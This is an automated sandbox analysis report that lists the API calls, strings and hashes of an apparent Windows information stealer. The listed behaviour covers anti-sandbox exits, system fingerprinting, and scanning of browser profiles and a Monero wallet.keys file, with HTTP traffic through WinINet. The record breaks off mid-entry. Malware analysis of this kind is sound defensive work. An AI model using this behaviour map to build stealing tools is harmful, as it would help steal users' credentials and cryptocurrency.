                          • CloseHandle.KERNEL32(?,00000000,?,00CC9408,?,0018110C,?,00000000,?,00181110,?,00000000,00180AEF), ref: 00176B1A
                          • ExitProcess.KERNEL32 ref: 00176B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 00166280: InternetOpenA.WININET(00180DFE,00000001,00000000,00000000,00000000), ref: 001662E1
                            • Part of subcall function 00166280: StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166303
                            • Part of subcall function 00166280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00166335
                            • Part of subcall function 00166280: HttpOpenRequestA.WININET(00000000,GET,?,00CCF4B8,00000000,00000000,00400100,00000000), ref: 00166385
                            • Part of subcall function 00166280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001663BF
                            • Part of subcall function 00166280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001663D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00175228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005473D3
                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005473FA
                          • GetNativeSystemInfo.KERNEL32(?), ref: 00547451
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$InfoNativeSystem
                          • String ID:
                          • API String ID: 1247124224-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0016112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00161132
                          • ExitProcess.KERNEL32 ref: 00161143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 4067759a4de749e34bd6e6673544d79c9be812e62501996fd3297c4353047251
                          • Instruction ID: b0fffe7cd136a9b23de6f09a0ba4fc1974896a2c069e0ddebd2a530b5ec9e09a
                          • Opcode Fuzzy Hash: 4067759a4de749e34bd6e6673544d79c9be812e62501996fd3297c4353047251
                          • Instruction Fuzzy Hash: CDE0E671985308FFE7516BA09D0AB1D7A7CAB05B01F104154F709B61D0D7B52A50D699
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001610B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001610F7
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 38f9a023ee89056a16b9c9f9d12e6c38e5e11a8942eceb541dbe6a692db06a13
                          • Instruction ID: 910025d86fc9123abde8277d82b53aba7fa40563b9329931f61afd24b48371d1
                          • Opcode Fuzzy Hash: 38f9a023ee89056a16b9c9f9d12e6c38e5e11a8942eceb541dbe6a692db06a13
                          • Instruction Fuzzy Hash: 1FF0E971641304BBEB1496A49C49FBBB7ECD705715F300444F504E3280D6715E00CA50
                          APIs
                            • Part of subcall function 001778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177910
                            • Part of subcall function 001778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00177917
                            • Part of subcall function 001778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0017792F
                            • Part of subcall function 00177850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001611B7), ref: 00177880
                            • Part of subcall function 00177850: RtlAllocateHeap.NTDLL(00000000), ref: 00177887
                            • Part of subcall function 00177850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0017789F
                          • ExitProcess.KERNEL32 ref: 001611C6
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 7840af96bee8301ae6bf9ea0cc16a5597b718194df7913dec2cbbfb6227ca567
                          • Instruction ID: 2a7757641742068cfdb339a180c318dde06f02c3af95ea125143a70571a28531
                          • Opcode Fuzzy Hash: 7840af96bee8301ae6bf9ea0cc16a5597b718194df7913dec2cbbfb6227ca567
                          • Instruction Fuzzy Hash: 07E012B695430163CB0177B1AC0AB2A32AC5B26345F084824FA0DD3552FB69E810C66A
                          APIs
                          • wsprintfA.USER32 ref: 001738CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 001738E3
                          • lstrcat.KERNEL32(?,?), ref: 00173935
                          • StrCmpCA.SHLWAPI(?,00180F70), ref: 00173947
                          • StrCmpCA.SHLWAPI(?,00180F74), ref: 0017395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00173C67
                          • FindClose.KERNEL32(000000FF), ref: 00173C7C
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 302095cf5d7d71358d32f7e62750fb4a701abfb942a83b5de906e782ce0a9952
                          • Instruction ID: 94c8e6786789efb35e89f4a3217f51b402b3d82f5b4f39f71236d029d1266a5c
                          • Opcode Fuzzy Hash: 302095cf5d7d71358d32f7e62750fb4a701abfb942a83b5de906e782ce0a9952
                          • Instruction Fuzzy Hash: 9AA172B2900218ABDB65DFA4CC85FEE737CBF99300F048588A61D96141EB759B84CF62
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00180B32,00180B2B,00000000,?,?,?,001813F4,00180B2A), ref: 0016BEF5
                          • StrCmpCA.SHLWAPI(?,001813F8), ref: 0016BF4D
                          • StrCmpCA.SHLWAPI(?,001813FC), ref: 0016BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0016C7D1
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 4aa0f4a9e3d01d210777d8ea1a939e98a7ffda6a620fd36f3e8cdd5ba7d9ce76
                          • Instruction ID: 78ae578aac134f62b97b8473275f396d0e35be09dcbca385f6e8d1f619271d76
                          • Opcode Fuzzy Hash: 4aa0f4a9e3d01d210777d8ea1a939e98a7ffda6a620fd36f3e8cdd5ba7d9ce76
                          • Instruction Fuzzy Hash: 06424672910104A7CB18FBB4DD96EEE737DAFA4300F808558B90E97191EF349B59CB92
                          APIs
                          • wsprintfA.USER32 ref: 0017492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00174943
                          • StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                          • StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                          • FindClose.KERNEL32(000000FF), ref: 00174B92
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: fff5c2a10aacade98b93d61dfb51cbb01942dfcd813e975d413ab48051aab9d7
                          • Instruction ID: 91fa0a5887ba407fb3517560a2502b5a63d9dfe65a99e67cfd6134acda4e6010
                          • Opcode Fuzzy Hash: fff5c2a10aacade98b93d61dfb51cbb01942dfcd813e975d413ab48051aab9d7
                          • Instruction Fuzzy Hash: 0D6186B2900618ABCB65EBA0DC45EEE737CBF59701F048588F60D96040EB75EB89CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00174580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00174587
                          • wsprintfA.USER32 ref: 001745A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 001745BD
                          • StrCmpCA.SHLWAPI(?,00180FC4), ref: 001745EB
                          • StrCmpCA.SHLWAPI(?,00180FC8), ref: 00174601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0017468B
                          • FindClose.KERNEL32(000000FF), ref: 001746A0
                          • lstrcat.KERNEL32(?,00CCFAF8), ref: 001746C5
                          • lstrcat.KERNEL32(?,00CCE118), ref: 001746D8
                          • lstrlen.KERNEL32(?), ref: 001746E5
                          • lstrlen.KERNEL32(?), ref: 001746F6
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 0db90db18d94ab6cfc4e6be1a4551be404306f046f6f3fdafee965cb83755ca8
                          • Instruction ID: d6c39bb443de84195a641003214bfa3102f4b67bfecd8e64031e723e0f15d8cf
                          • Opcode Fuzzy Hash: 0db90db18d94ab6cfc4e6be1a4551be404306f046f6f3fdafee965cb83755ca8
                          • Instruction Fuzzy Hash: AC5169B2540218ABC765EBB0DC89FEE777CAB59700F408588F60D96150EB759B84CF92
                          APIs
                          • wsprintfA.USER32 ref: 00173EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00173EDA
                          • StrCmpCA.SHLWAPI(?,00180FAC), ref: 00173F08
                          • StrCmpCA.SHLWAPI(?,00180FB0), ref: 00173F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0017406C
                          • FindClose.KERNEL32(000000FF), ref: 00174081
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 644ebb8e993caef985aa5a8e6ca873757f08f54c57a2327e5c3dee995efd323c
                          • Instruction ID: f3623ee565372955d34abe8796cbc4899cf67dd1931a9a08f4fce875d5084c01
                          • Opcode Fuzzy Hash: 644ebb8e993caef985aa5a8e6ca873757f08f54c57a2327e5c3dee995efd323c
                          • Instruction Fuzzy Hash: 375176B2900618ABCB65FBB0DC85EEE737CBB99304F408588B75D96040DB759B89CF91
                          APIs
                          • wsprintfA.USER32 ref: 0016ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0016ED55
                          • StrCmpCA.SHLWAPI(?,00181538), ref: 0016EDAB
                          • StrCmpCA.SHLWAPI(?,0018153C), ref: 0016EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0016F2C3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: e2bb02db1d619afc57717e551aaaf4a0b1705ad732ccaa8a34e5f5d7ad11ca25
                          • Instruction ID: 175e562c609fda5cbfe1eac39784de8ed7f8c3dda2a70b8506809aeaa7e2965f
                          • Opcode Fuzzy Hash: e2bb02db1d619afc57717e551aaaf4a0b1705ad732ccaa8a34e5f5d7ad11ca25
                          • Instruction Fuzzy Hash: 66E1D3729111189ADB55FB60DC52EEE737CAFA4301F8085D9B51E62092EF306F8ACF52
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001815B8,00180D96), ref: 0016F71E
                          • StrCmpCA.SHLWAPI(?,001815BC), ref: 0016F76F
                          • StrCmpCA.SHLWAPI(?,001815C0), ref: 0016F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0016FAC3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 22f4de46d8d77f017bf97d57328de5a59686747c92fbfb0ec52876e8156381d8
                          • Instruction ID: ec841dd489540a8a2a8327ff99604ca02d017b0d3419991d34326a13423e7bd4
                          • Opcode Fuzzy Hash: 22f4de46d8d77f017bf97d57328de5a59686747c92fbfb0ec52876e8156381d8
                          • Instruction Fuzzy Hash: 1CB144719001189BCB24FF74DC56EEE7379AFA4301F8085A8A50E97191EF315B5ACF92
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0018510C,?,?,?,001851B4,?,?,00000000,?,00000000), ref: 00161923
                          • StrCmpCA.SHLWAPI(?,0018525C), ref: 00161973
                          • StrCmpCA.SHLWAPI(?,00185304), ref: 00161989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00161D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00161DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00161E20
                          • FindClose.KERNEL32(000000FF), ref: 00161E32
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 433ecc31cdce9f775a807e37145c73ee6c67507c12364d3edbb6817175972289
                          • Instruction ID: fce7e0017bc256f99a84d02b9e258d6b3e1dec4b0c45a3b640b9cb8d0c9685e7
                          • Opcode Fuzzy Hash: 433ecc31cdce9f775a807e37145c73ee6c67507c12364d3edbb6817175972289
                          • Instruction Fuzzy Hash: EE1207719501189BDB59FB60CC96EEE737CAFA4301F808599B51E62091EF306F89CF92
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00180C2E), ref: 0016DE5E
                          • StrCmpCA.SHLWAPI(?,001814C8), ref: 0016DEAE
                          • StrCmpCA.SHLWAPI(?,001814CC), ref: 0016DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0016E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 566fd9354f0865877c194d83c63f67fd6a12dbb3f9ce8f932844ff07da1b973f
                          • Instruction ID: df04f7dcf0dd38588199fe638343c97c21c4fc82d21cbbe6c65825f36f5091df
                          • Opcode Fuzzy Hash: 566fd9354f0865877c194d83c63f67fd6a12dbb3f9ce8f932844ff07da1b973f
                          • Instruction Fuzzy Hash: CFF17D719541189ADB19FB60DC95EEE7378BFA4301FC081D9A51E62091EF306F8ACF62
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001814B0,00180C2A), ref: 0016DAEB
                          • StrCmpCA.SHLWAPI(?,001814B4), ref: 0016DB33
                          • StrCmpCA.SHLWAPI(?,001814B8), ref: 0016DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0016DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 32d6dd2b75f913e1469a6dc7135cbc76fe1e316ec58a7310a9e870c5f53bff4e
                          • Instruction ID: 59f90dbeb0e2030edafb965be52d98d078038a3301e20b53eaacd69d3d69b84d
                          • Opcode Fuzzy Hash: 32d6dd2b75f913e1469a6dc7135cbc76fe1e316ec58a7310a9e870c5f53bff4e
                          • Instruction Fuzzy Hash: 97913372A00104ABCB15FBB4EC569EE737DAFE5301F80C558B91A96181EF349B19CB93
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %x~o$1J/$5J/$JCj[$W?5$W?5$t\_$/}$n}^
                          • API String ID: 0-2749340528
                          • Opcode ID: d2326108b9af6df26ec6643e2c8cc2335dd66ea178aebba894c9d939da442a92
                          • Instruction ID: 1ee6d0300d1ef64cd83ccb7928e30e6b030910e9997eb529366bacd1765d4b03
                          • Opcode Fuzzy Hash: d2326108b9af6df26ec6643e2c8cc2335dd66ea178aebba894c9d939da442a92
                          • Instruction Fuzzy Hash: B6B21BF360C6009FE308AE2DDC8567AB7E9EF94720F1A863DEAC5C7744E93558018697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
